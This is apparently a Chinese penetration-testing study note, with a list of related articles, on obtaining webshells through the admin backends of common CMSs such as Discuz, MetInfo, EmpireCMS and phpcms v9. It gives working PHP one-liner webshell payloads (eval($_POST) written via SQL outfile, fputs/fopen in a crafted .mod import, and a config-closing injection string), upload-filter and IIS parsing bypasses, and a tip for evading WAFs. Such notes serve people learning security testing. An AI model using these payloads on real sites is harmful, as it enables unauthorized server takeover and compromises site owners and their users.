常见cms

良精、科讯、动易、aspcms、dz

米拓cms、phpcms2008、帝国cms、phpv9

phpweb、dedecms

良精

方法:

1、数据库备份拿shell

上传图片——点击数据库备份——改为脚本格式——添加账号,讲一句话添加在用户名处——备份——改为脚本格式

2、双文件上传

3、配置插马

4、修改文件上传类型直接上传

科讯(用IE)

/admin/admin.asp   后台路径

1、利用解析漏洞

2、设置——网站基本信息设置——默认允许上传文件类型,将asp改为aaspsp(会将asp替换为空)

内容——图片添加——上传时改为aaspsp

设置——基本设置——其它选项——通用页面目录——html/a.asp/(目录解析)——标签——自定义静态标签——增加静态标签——插入一句话——自定义页面——生成一个页面,会在a.asp目录下

动易(学校,简单的企业)

在网站配置中插马——连接inc/config.asp文件

数据库备份

双文件上传

aspcms

界面风格——编辑模板/css文件(利用IIS6.0解析漏洞)——添加——文件系统——a.asp;html——内容插入一句话

拓展功能——幻灯片设置——插马

dz

uckey或利用插件上传(常见的网站discuz x2.5)

后台 admin.php或cu_server

站长——ucenter设置(通过配置插马,闭合拿shell)

站长——数据库备份(或短文件漏洞)

米拓cms

metinfo 5.3.18                   install/phpinfo.php——里面能找到网站根目录

后台         admin/index.php (上传图片马 包含文件)

后台——安全——数据库备份——下载——打开(txt)——在完整的一句话后面写入新的一句话(select “<?php @eval($_POST[A]);?>” into outfile ‘网站根目录,路径写成Linux路径’)——恢复(一般在晚上没有数据交互的时候再做)

权限要求很高

帝国cms

empircms-v6.6

127.0.0.1/e/install

后台:127.0.0.1/e/admin/index.php

后台——数据表与系统模型——管理数据表——管理系统表模型——导入系统模型(要导.mod的文件)——<?fputs(fopen(“cnm.php”,”w”),”<?eval(\$_POST[cmd];)?>”)?>保存为mod文件,文件名为aa.php.mod——记住导入的目录路径/e/admin/cnm.php

注意:导入时候可能会有waf,可以在脚本中加入免杀的一句话

phpv9

phpcms_v9.6.3_GBK

127.0.0.1/install

后台——界面——模板风格——详情列表——search——编辑插马

后台——phpsso——系统管理——ucenter配置——uc_config.php中 ‘);eval($_post[a]);#

后台——内容——专题         phpv9低权限拿shell

phpweb

dedecmd

渗透测试学习 二十三、常见cms拿shell的更多相关文章

  1. 渗透测试学习 二十二、getshell总结

    大纲   管理员权限拿shell 普通权限拿shell 常见cms拿shell 进后台主要是可以对网站前台的内容,样式等做操作,要改脚本的内容的权限只有在webshell的权限下才可以(某些情况除外) ...

  2. 渗透测试学习 二十九、kali安装,信息搜集,服务器扫描

    kali安装,信息搜集,服务器扫描 kali介绍 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统.由Offensive Security Ltd维护和资助.最先由 ...

  3. 渗透测试学习 二十、 其他漏洞汇总之PHP相关漏洞

    大纲: PHP相关漏洞 JSP相关漏洞 其他漏洞汇总 PHP相关漏洞 文件包含漏洞 php://input等伪协议利用 代码执行漏洞 变量覆盖漏洞 文件包含漏洞 程序开发人员一般会把重复使用的函数写到 ...

  4. 渗透测试学习 二、Windows基础

    系统目录  服务  端口  注册表  黑客常用DOS命令(在拿到shell时会用到) 一.  系统目录 Windows目录  系统的安装目录 System32àconfigàSAM文件  是用户密码的 ...

  5. 渗透测试学习 二十八、WAF绕过详解

    大纲: WAF防护原理讲解 目录扫描绕过WAF 手工注入绕过WAF sqlmap绕过WAF 编写salmap绕过WAF 过WAF一句话编写讲解 菜刀连接绕过WAF webshell上传绕过WAF 提权 ...

  6. 渗透测试学习 二十一、 JSP相关漏洞

    大纲 ST2漏洞  (Struts2) 反序列漏洞              网站容器,中间键 其他漏洞 Struts2漏洞 简介: Struts2是一个基于MVC设计模式的Web应用框架,它本质上相 ...

  7. 渗透测试学习 十三、 SQLmap使用详解

    SQLmap介绍 sqlmap是一个由python语言编写的开源的渗透测试工具,它主要是检测SQL注入漏洞,是一款功能强大的SQL漏洞检测利用工具. 他可以检测的数据库有:access.msSQL.M ...

  8. Kali Linux Web 渗透测试视频教程— 第十三课-密码破解

    Kali Linux Web 渗透测试— 第十三课-密码破解 文/玄魂 目录 Kali Linux Web 渗透测试— 第十三课-密码破解............................... ...

  9. 【渗透测试学习平台】 web for pentester -2.SQL注入

    Example 1 字符类型的注入,无过滤 http://192.168.91.139/sqli/example1.php?name=root http://192.168.91.139/sqli/e ...

随机推荐

  1. arcgis api for javascript 学习(三) 调用发布地图信息,并将地图属性信息输出到Excel表中

    吐血推荐:网上搜了很久关于webgis地图属性表输出到Excel表,并没能找到相关有价值的信息,在小白面前,这就是一脸懵x啊!网上要么是关于前端如何在页面上直接导出excel,和webgis半毛钱关系 ...

  2. 这些Android系统样式中的颜色属性你知道吗?

    Android 系统样式中的颜色属性 推荐阅读看完后彻底搞清楚Android中的 Attr . Style .Theme 几个常用的颜色属性 先放上一张经典的图片,图片来自网络. 这张图在网上很是流传 ...

  3. SpringCloud之Eureka:服务发布与调用例子

    Eureka是Netflix开发的服务发现框架,本身是一个基于REST的服务,主要用于定位运行在AWS域中的中间层服务,以达到负载均衡和中间层服务故障转移的目的. SpringCloud将它集成在其子 ...

  4. windows下安装react

    在 Windows 10 64 下创建 React App 由 SHUIJINGWAN · 2018/03/26   1.在官方网站:https://nodejs.org/zh-cn/ 下载推荐版本: ...

  5. 使用python对整个网页进行截图

    方法一.使用PyQt4的QtWebKit组件 ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 ...

  6. 机器学习--PCA算法代码实现(基于Sklearn的PCA代码实现)

    一.基于Sklearn的PCA代码实现 import numpy as np import matplotlib.pyplot as plt from sklearn import datasets ...

  7. NVIDIA-SMI has failed because it couldn't communicate with the NVIDIA driver ...

    显卡驱动找不到解决方案:亲测有效 step1:sudo apt-get install dkms step2:   sudo dkms install -m nvidia -v 390.129 nvi ...

  8. 《3D_Deep_Learning_for_Robot_Perception.pdf》

    https://github.com/PrincetonVision/marvin

  9. appium 使用name 定位报错 Locator Strategy 'name' is not supported for this session【appium-desktop】

    RF中使用 name定位 报错提示: Locator Strategy 'name' is not supported for this session 解决: 1.打开本地文件 driver.js ...

  10. 层级轮播图(animate)

    层级轮播图(animate) css <style type="text/css"> * { margin: 0; padding: 0; } ul, ol { lis ...